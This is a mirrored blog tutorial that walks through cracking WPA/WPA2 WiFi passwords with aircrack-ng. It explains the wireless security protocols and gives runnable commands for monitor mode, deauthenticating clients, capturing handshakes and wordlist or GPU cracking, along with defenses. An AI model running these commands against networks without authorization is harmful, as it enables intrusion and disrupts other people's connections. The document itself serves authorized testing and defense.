Wireless Attack with Aircrack-ng : A Complete Guide from A to Z

Wireless Attack with Aircrack-ng : A Complete Guide from A to Z | by Yurichi Tamaki - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original Wireless Attack with Aircrack-ng : A Complete Guide from A to Z A deep technical dive into WPA handshake capture and WiFi password cracking — for educational and authorized testing purposes only. Yurichi Tamaki Follow ~10 min read · March 22, 2026 (Updated: March 22, 2026) · Free: Yes Introduction Wireless network security is one of the most critical topics in cybersecurity. Every day, millions of people connect to WiFi networks without thinking about potential vulnerabilities lurking in the air around them. Aircrack-ng is the industry-standard suite used by penetration testers and security researchers to assess the robustness of WiFi networks. In this article, we will explore in full technical detail how a wireless attack works against a WPA/WPA2 network — from hardware setup all the way to cracking the captured password. ⚠️ Legal Warning : The techniques presented here must only be used on networks you own or have explicit written authorization to test. Unauthorized use is illegal and may result in criminal prosecution. 1. What is Aircrack-ng? Aircrack-ng is a complete open-source suite dedicated to WiFi security auditing. It groups together several complementary tools: airmon-ng — Monitor mode management airodump-ng — Packet capture and reconnaissance aireplay-ng — Packet injection and active attacks aircrack-ng — WEP/WPA/WPA2 cracking airdecap-ng — Capture decryption It comes pre-installed on Kali Linux and is compatible with most security-oriented Linux distributions. 2. Understanding WPA/WPA2 Before talking about attacks, you need to understand what you are attacking. The 4-Way Handshake When a client connects to a WPA/WPA2 access point, both parties negotiate a session key through a 4-message exchange called the 4-Way Handshake. This exchange uses the PMK (Pairwise Master Key), which is derived from the WiFi password. Client ←→ Access Point [1] AP → Client : ANonce (random value) [2] Client → AP : SNonce + MIC (Message Integrity Code) [3] AP → Client : Encrypted GTK + MIC [4] Client → AP : Confirmation The critical point: the handshake contains enough information to verify offline whether a password is correct — without ever needing to reconnect to the network. This is exactly what Aircrack-ng exploits. WPA vs WPA2 vs WPA3 — Differences and Algorithms To fully understand wireless attacks, you need to understand the evolution of WiFi security protocols and the cryptographic algorithms behind each one. A Brief History WiFi security did not start with WPA. The original standard was WEP (Wired Equivalent Privacy), introduced in 1997. It was broken so fundamentally that it can be cracked in minutes today. WPA was introduced as an emergency replacement, and WPA2 followed as the proper long-term solution. WPA3 is the current state of the art. WEP — Wired Equivalent Privacy (1997) — Broken Algorithm: RC4 stream cipher Key size: 40-bit or 104-bit Authentication: Open System or Shared Key WEP was the first attempt at WiFi encryption. It uses the RC4 stream cipher with a static key shared between all clients and the access point. The fundamental flaw is that WEP reuses Initialization Vectors (IVs) — short 24-bit values prepended to the key. With enough captured packets, statistical analysis reveals the key entirely. Tools like aircrack-ng can crack WEP in under 5 minutes by collecting around 50,000 to 100,000 packets. Status: Completely broken. Never use WEP under any circumstances. WPA — WiFi Protected Access (2003) — Weak Algorithm: TKIP (Temporal Key Integrity Protocol) built on RC4 Key size: 128-bit per-packet key Authentication: PSK (Pre-Shared Key) or 802.1X (Enterprise) Handshake: 4-Way Handshake WPA was introduced as an urgent patch for WEP while WPA2 was being developed. Instead of replacing RC4 entirely, WPA wraps it in TKIP which generates a new per-packet key using a mixing function. This fixed the IV reuse problem of WEP. However, TKIP itself has known vulnerabilities — the Beck-Tews attack (2008) and the Ohigashi-Morii attack (2009) can partially break TKIP in minutes under certain conditions. The 4-Way Handshake introduced in WPA is still used in WPA2 and is the basis of the attack described in this article. Status: Deprecated. Vulnerable to handshake capture + offline dictionary attack. Avoid. WPA2 — WiFi Protected Access 2 (2004) — Current Standard Algorithm: AES-CCMP (Advanced Encryption Standard — Counter Mode CBC-MAC Protocol) Key size: 128-bit Authentication: PSK or 802.1X (Enterprise) Handshake: 4-Way Handshake Optional: TKIP (backward compatibility, not recommended) WPA2 replaced RC4 and TKIP with AES-CCMP, a fundamentally stronger cipher. AES is a symmetric block cipher adopted as the US federal standard (FIPS 197). CCMP adds message integrity checking on top of AES encryption, preventing both eavesdropping and packet tampering. WPA2 has two modes: WPA2-Personal (PSK) — A shared password is used by all clients. This is what home and small office networks use. Vulnerable to offline dictionary attacks on the captured 4-Way Handshake. WPA2-Enterprise (802.1X) — Each user authenticates individually via a RADIUS server using certificates or credentials. The key is unique per session and per user. Capturing the handshake does not allow offline cracking of individual credentials. Known vulnerabilities in WPA2-Personal: KRACK (Key Reinstallation Attack, 2017) — Exploits flaws in the 4-Way Handshake state machine to reinstall an already-used key, allowing decryption and replay of traffic. Patched in most devices. PMKID Attack (2018) — Allows capturing a single frame from the AP without needing a connected client, enabling offline cracking without waiting for a full handshake. Offline dictionary attacks on the 4-Way Handshake — The core attack this article covers. Status: Still widely used. Secure against passive eavesdropping when combined with a strong random password, but fundamentally vulnerable to offline brute-force if the password is weak. WPA3 — WiFi Protected Access 3 (2018) — Current Best Standard Algorithm: AES-GCMP-256 (Galois/Counter Mode Protocol, 256-bit) Authentication: SAE (Simultaneous Authentication of Equals) replaces PSK Handshake: Dragonfly Handshake (based on Diffie-Hellman) Forward Secrecy: Yes Management Frame Protection: Mandatory (802.11w) WPA3 is a complete redesign of the authentication and key exchange mechanism. It solves the core weakness of WPA2-Personal. The key innovation is SAE (Simultaneous Authentication of Equals), also called the Dragonfly handshake. Unlike WPA2 which derives the session key directly from the password in a way that can be tested offline, SAE uses a zero-knowledge proof based on Diffie-Hellman key exchange. Even if an attacker captures the entire SAE exchange, they cannot test passwords offline — each guess requires a live interaction with the access point. WPA3 also introduces Perfect Forward Secrecy (PFS). This means that even if the password is eventually discovered, past captured traffic cannot be decrypted retroactively because each session used a unique key that no longer exists. WPA3 modes: WPA3-Personal — Uses SAE instead of PSK. Offline dictionary attacks are impossible. Each password guess requires interacting with the AP, making brute force impractical. WPA3-Enterprise — Uses 192-bit AES-GCMP-256 with Suite B cryptography (ECDHE, ECDSA). Designed for high-security environments like government and financial institutions. WPA3-Enhanced Open — Uses OWE (Opportunistic Wireless Encryption) for open networks (cafes, airports). Encrypts traffic even without a password, preventing passive eavesdropping on open hotspots. Known vulnerabilities in WPA3: Dragonblood attacks (2019) — Side-channel attacks and downgrade attacks against early WPA3 implementations. Patched in most modern firmware. Require physical proximity and active interaction. Status: The gold standard. Use WPA3 whenever possible. Immune to the offline handshake cracking attack described in this article. Side-by-Side Comparison Protocol — Year — Encryption — Key Exchange — Offline Cracking — Status WEP — 1997 — RC4 (broken) — Static key — Yes, trivially — Never use WPA — 2003 — TKIP/RC4–4-Way Handshake — Yes, dictionary — Deprecated WPA2–2004 — AES-CCMP 128-bit — 4-Way Handshake — Yes, if weak password — Acceptable with strong password WPA3–2018 — AES-GCMP 256-bit — SAE Dragonfly — No — Recommended Why This Matters for the Attack The entire attack described in this article — capturing the 4-Way Handshake and running an offline dictionary attack — works only against WPA and WPA2 Personal. The vulnerability is not in AES itself (which is unbroken), but in the fact that the handshake allows offline verification of password guesses. WPA3 eliminates this entirely. No captured handshake, no offline cracking. The attacker would need to send live authentication attempts to the access point — slow, noisy, and easily blocked. This is why upgrading to WPA3 is the single most impactful defense against wireless attacks. 3. Required Hardware Compatible Wireless Adapter This is the most critical requirement. Your built-in laptop WiFi card will generally not work. You need an external USB adapter that supports: Monitor mode — to capture all surrounding packets passively Packet injection — to send forged frames to force reactions Recommended chipsets: Atheros AR9271 — Excellent support, reliable injection, 2.4 GHz Ralink RT3070 / RT3572 — Good support, dual-band depending on model MediaTek MT7612U — Dual-band 2.4/5 GHz support What to avoid: Realtek RTL8188EUS — Unstable monitor mode, unreliable injection, 2.4 GHz only. The default kernel driver does not properly support aircrack-ng. If you use one anyway, install the out-of-tree driver: sudo apt install realtek-rtl88xxau-dkms Then reboot before continuing. Software Kali Linux (recommended) or any distribution with aircrack-ng installed Wordlist: /usr/share/wordlists/rockyou.txt (available on Kali by default) 4. Step 1 — Check Your Interface Start by identifying your wireless interface: iwconfig Example output: wlan0 IEEE 802.11 Mode:Managed Frequency:2.472 GHz Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Power Management:off Note your interface name (wlan0 in this example). You will use it in all subsequent commands. 5. Step 2 — Enable Monitor Mode Kill Interfering Processes NetworkManager and wpa_supplicant will interfere with monitor mode. Kill them first: sudo airmon-ng check kill Enable Monitor Mode sudo airmon-ng start wlan0 The interface is usually renamed to wlan0mon. Verify with: iwconfig You should see Mode:Monitor in the output. Realtek Adapter Problem Some Realtek adapters (like the RTL8188EUS) do not properly respond to airmon-ng. If your interface still shows Mode:Monitor after running airmon-ng stop, force it manually: sudo ip link set wlan0 down sudo iwconfig wlan0 mode managed sudo ip link set wlan0 up sudo systemctl restart NetworkManager 6. Step 3 — Reconnaissance with airodump-ng Scan Nearby Networks For 2.4 GHz only (basic adapters): sudo airodump-ng wlan0mon To scan all bands including 5 GHz (requires a capable adapter): sudo airodump-ng --band abg wlan0mon ⚠️ Do not use — band abg with a 2.4 GHz-only adapter like the RTL8188EUS. You will get no results at all. Just use the plain command with no — band flag. Reading the airodump-ng Output BSSID PWR CH ENC ESSID AA:BB:CC:DD:EE:FF -45 6 WPA2 MyNetwork 11:22:33:44:55:66 -72 1 WPA2 NeighborWifi BSSID STATION PWR Frames AA:BB:CC:DD:EE:FF FF:EE:DD:CC:BB:AA -55 45 Note down for your target: BSSID: MAC address of the access point (e.g. AA:BB:CC:DD:EE:FF) CH: Channel number (e.g. 6) STATION: MAC address of a connected client (e.g. FF:EE:DD:CC:BB:AA) 7. Step 4 — Targeted Handshake Capture Now that you have identified your target, launch a focused capture: sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture_file wlan0mon -c 6 → Lock onto channel 6 — bssid → Filter only the target AP traffic -w capture_file → Write the capture to capture_file-01.cap Leave this command running in a terminal. You are waiting for the message WPA handshake: AA:BB:CC:DD:EE:FF to appear in the top-right corner of the terminal. That confirms the handshake has been captured. 8. Step 5 — Deauthentication Attack If no client connects naturally, you can force a handshake by kicking an existing client off the network. Open a second terminal while airodump-ng is still running: sudo aireplay-ng --deauth 1 -a AA:BB:CC:DD:EE:FF -c FF:EE:DD:CC:BB:AA wlan0mon — deauth 1 → Send 1 deauthentication frame -a → BSSID of the target access point -c → MAC address of the target client The client disconnects and automatically reconnects, triggering the 4-Way Handshake which airodump-ng captures instantly. Note: Using — deauth 0 sends frames continuously (flood mode). This is more aggressive and much easier to detect by a wireless IDS. Broadcast Deauth (No Specific Client) If you cannot identify a specific client MAC, you can deauthenticate everyone on the network: sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon This sends 5 deauth frames to the broadcast address, disconnecting all connected clients simultaneously. 9. Step 6 — Crack the Handshake Once the handshake is captured in capture_file-01.cap, cracking happens entirely offline — no need to be near the target network anymore: aircrack-ng -w /usr/share/wordlists/rockyou.txt capture_file-01.cap Aircrack-ng tests each password from the wordlist by recalculating the MIC and comparing it against the one in the captured handshake. If they match, the password is found. Speed Up with hashcat (GPU) For dramatically faster cracking, convert the capture and use hashcat with your GPU: hcxpcapngtool -o hash.hc22000 capture_file-01.cap hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt A modern GPU can test tens of millions of passwords per second, compared to a few thousand per second on a CPU. For complex passwords this difference is significant. 10. Restore Your Interface After testing, return the interface to normal managed mode: sudo airmon-ng stop wlan0mon sudo systemctl restart NetworkManager Verify with iwconfig that the mode is back to Managed. 11. Limitations of the Attack Physical proximity — You must be within radio range of the target network. Walls and distance significantly degrade signal. Strong password — A password of 20+ random characters is completely resistant to dictionary attacks. No wordlist will crack it. WPA3 — Resistant to offline dictionary attacks thanks to the SAE (Simultaneous Authentication of Equals) protocol. The handshake equivalent in WPA3 cannot be cracked offline. 802.11w / MFP (Management Frame Protection) — Deauthentication frames are cryptographically protected, completely blocking the deauth attack described in this article. Limited chipset — Adapters like the Realtek RTL8188EUS do not support reliable packet injection, making the deauth step unreliable or impossible. 12. Defenses and Counter-Measures If you manage a WiFi network, here is how to protect it effectively: Use WPA3 if your devices support it. It is the most resistant standard available today and eliminates offline cracking entirely. Use a long random password — 20+ characters generated randomly. Use a password manager to store it. This alone defeats all dictionary attacks. Enable 802.11w (Management Frame Protection) in your router settings. This cryptographically signs management frames and completely blocks deauth flood attacks. Deploy a WIDS (Wireless Intrusion Detection System) to detect deauth floods, rogue access points, and suspicious scanning activity on your network. Segment your network — keep IoT devices, guest devices, and critical machines on separate VLANs. A compromised IoT device should not reach your main machines. Monitor your access point logs regularly for abnormal disconnections, repeated authentication attempts, or unusual client behavior. Conclusion Aircrack-ng remains the gold standard tool for wireless penetration testing. The full attack chain — monitor mode, reconnaissance, deauthentication, handshake capture, offline cracking — perfectly illustrates why WPA2 with a weak password is still a serious vulnerability in 2026. The best defense is a combination of WPA3, Management Frame Protection (802.11w), and a strong random password. These three together make the attack described in this article practically impossible to execute. #cybersecurity #networking #wifi-security #ethical-hacking #bug-bounty Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).